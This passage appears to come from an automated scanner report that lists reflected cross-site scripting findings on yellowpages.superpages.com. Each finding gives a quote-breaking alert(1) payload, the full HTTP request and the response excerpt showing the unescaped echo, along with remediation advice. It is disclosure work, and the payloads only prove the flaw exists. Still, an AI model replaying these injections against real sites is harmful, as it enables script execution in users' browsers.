The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32667
Date: Thu, 03 Feb 2011 17:10:08 GMT
Connection: close


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler88a3b&quot;-alert(1)-&quot;f68d6ca10b2/abook.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=55AB36387FFC53A62D516A7528117702; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:42 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
v = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler/abook.jsp8f26e&quot;-alert(1)-&quot;c50d8f06cd0
Server: Unspecified
Set-Cookie: JSESSIONID=3509911F0F012E3B5DB1A7C0CB989815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:53 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
//yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64285
Date: Thu, 03 Feb 2011 17:11:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
m';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64190
Date: Thu, 03 Feb 2011 17:10:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviewsdaf46&quot;-alert(1)-&quot;5c6fb56425b/js/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=8C8FB1AE6353FA670702AEA79FA748ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jsdbcb3&quot;-alert(1)-&quot;62acf7edf87/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=F0D826CA6507947C1A8E9F5CFFA2E340; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/ajaxreviews.js16b42&quot;-alert(1)-&quot;90ac00c6709
Server: Unspecified
Set-Cookie: JSESSIONID=0F2C1426EA2D2BBFB71984CD0E56C453; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews379de&quot;-alert(1)-&quot;93123347901/js/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4F8506785984A473A9B8524947C7EA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:51 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews379de"-alert(1)-"93123347901/js/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jse628d&quot;-alert(1)-&quot;c967b65125d/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=0AFB22647AF905FBE48BA572E2509F50; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jse628d"-alert(1)-"c967b65125d/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/logclick.js66a3d&quot;-alert(1)-&quot;07047fb75a4
Server: Unspecified
Set-Cookie: JSESSIONID=1ACF9BB55F7200980D5EE25293B5CD5B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:15 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /sec297c&quot;-alert(1)-&quot;e7400485e53/compositepage.css
Server: Unspecified
Set-Cookie: JSESSIONID=396D5ADBD4D3142B9A631194C0B5FB09; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/sec297c"-alert(1)-"e7400485e53/compositepage.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /se/compositepage.css9b676&quot;-alert(1)-&quot;7c7f2a5b008
Server: Unspecified
Set-Cookie: JSESSIONID=EF454397094E37958A6FE11A378F5815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:02 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/se/compositepage.css9b676"-alert(1)-"7c7f2a5b008?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp93874&quot;-alert(1)-&quot;5a42a034316/js/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=3158E03FC87257FBDA42942A3231293F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:23 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp93874"-alert(1)-"5a42a034316/js/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/jsa1fb9&quot;-alert(1)-&quot;1f6ee091e6a/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=D78C585477C06ABDFE12EC5A0B25B438; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:40 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
